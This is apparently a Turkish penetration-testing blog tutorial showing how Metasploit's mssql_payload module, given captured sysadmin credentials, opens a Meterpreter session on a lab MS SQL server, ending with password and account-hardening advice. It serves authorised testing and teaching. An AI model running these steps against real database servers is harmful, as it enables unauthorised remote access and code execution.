MSF mssql_payload İstismar Modülü ve Elde Edilen MS SQL Veritabanı Kimlik Bilgileri ile MS SQL Veritabanı Sunucusuna Meterpreter Bağlantısı Elde Edilmesi

0
240
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola) kullanılarak MS SQL veritabanı uygulamasına erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parolası) elde edilmiş bir MS SQL veritabanı sunucusuna MSF mssql_payload istismar modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 172.22.71.5, MS SQL veritabanının kurulu olduğu Windows Server 2008 R2 sunucunun IP adresi ise 172.22.71.247 olduğu ve sysadmin rolündeki “test” veritabanı hesabının parolasının “test” olarak tespit edildiğini varsayalım.

Meterpreter komut satırı elde etmek için MSF mssql_payload istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search mssql_payload
use exploit/scanner/mssql/mssql_payload
show options

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-payload-exploit-module-01

MS SQL veritabanında yerel yönetici haklarına sahip olan ve kimlik bilgileri (“test/test”) elde edilen kullanıcı hakları ile MSF mssql_payload istismar modülü aşağıdaki gibi ayarlanabilir ve modül çalıştırılabilir:

set RHOST 172.22.71.247
set USERNAME test
set PASSWORD test
show options
run

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-payload-exploit-module-02

Böylece, MSSQLSERVER servisinin yetkileri ile Meterpreter bağlantısının açıldığı görülmektedir.

getuid
background
sessions

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-payload-exploit-module-03

Yukarıdaki ekran görüntüsünde de görüldüğü gibi MS SQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MSSQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında “test” hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.